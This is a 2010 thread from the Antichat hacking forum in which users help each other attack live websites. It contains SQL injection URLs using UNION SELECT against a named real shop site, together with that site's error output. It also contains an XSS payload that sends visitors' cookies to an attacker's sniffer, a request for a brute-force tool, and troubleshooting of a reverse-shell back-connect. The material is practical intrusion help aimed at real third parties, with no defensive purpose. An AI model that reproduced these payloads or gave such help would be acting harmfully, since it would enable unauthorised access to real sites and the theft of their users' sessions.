HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.06.2010, 15:28
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от haito  
Hi Team;

http://www.ibuycc.com.cn/product.php?id=77'

этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
Можем ли мы "inject" этот сайт?
Код:
http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
хватит спрашивать одно и тоже. читай статьи и всё будет ясно


Цитата:
Сообщение от haito  
К сожалению, не видел, любое проявление версия
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]
так видно? О_о

Код:
http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),version(),7,version(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

Последний раз редактировалось .:[melkiy]:.; 05.06.2010 в 15:46..
 
Ответить с цитированием

  #2  
Старый 05.06.2010, 15:40
haito
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами: 8399502

Репутация: 0
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
Код:
http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

Благодарю за ответ, но не отображать версии


Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]

Последний раз редактировалось haito; 05.06.2010 в 15:53..
 
Ответить с цитированием

  #3  
Старый 05.06.2010, 16:09
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от haito  
Благодарю за ответ, но не отображать версии


Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
‹�����xÚí}ëwG¶ïçËZùú(k]
Убери пробелы...
 
Ответить с цитированием

  #4  
Старый 05.06.2010, 15:21
youger
Познающий
Регистрация: 03.05.2010
Сообщений: 51
С нами: 8434116

Репутация: 1
По умолчанию

Цитата:
Сообщение от wkar  
я еще не слышал об обходе такого
ПС
БрутЬ, брутЬ и еще раз ЬрутЪ
есть готовый брут под этот случай?
 
Ответить с цитированием

  #5  
Старый 05.06.2010, 16:20
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

Цитата:
Сообщение от youger  
есть готовый брут под этот случай?
Попробуй этот: https://forum.antichat.ru/thread109600.html
 
Ответить с цитированием

  #6  
Старый 05.06.2010, 12:21
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Подскажите пожалуйста.
На сайте при вводе вместо логина <script>alert()</script> выскакивает табличка. я так понял это xss. Покурили маны малеха ну так и не допёр. модифицирую запрос до
<sсriрt>img = new Image(); img.src = "путь до снифа?"+document.cookie;</sсriрt>

вставляю в то же поля и ничего не выскакивает. в чем прикол?
 
Ответить с цитированием

  #7  
Старый 05.06.2010, 12:24
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Прикол в том, что ничего и не выскочит, но куки отправятся на сниффер.
 
Ответить с цитированием

  #8  
Старый 05.06.2010, 13:22
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Спасибо. буду разбираться. у меня сниф делюкс и мильти каника, что то не ловит куки.
 
Ответить с цитированием

  #9  
Старый 05.06.2010, 13:39
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами: 8718197

Репутация: 11
По умолчанию

Что может мешать сделать бекконект ?Система freebsd 7.2.
Спасибо
 
Ответить с цитированием

  #10  
Старый 05.06.2010, 13:51
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Может быть тот порт занят через который ты бэкконнект делаешь.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.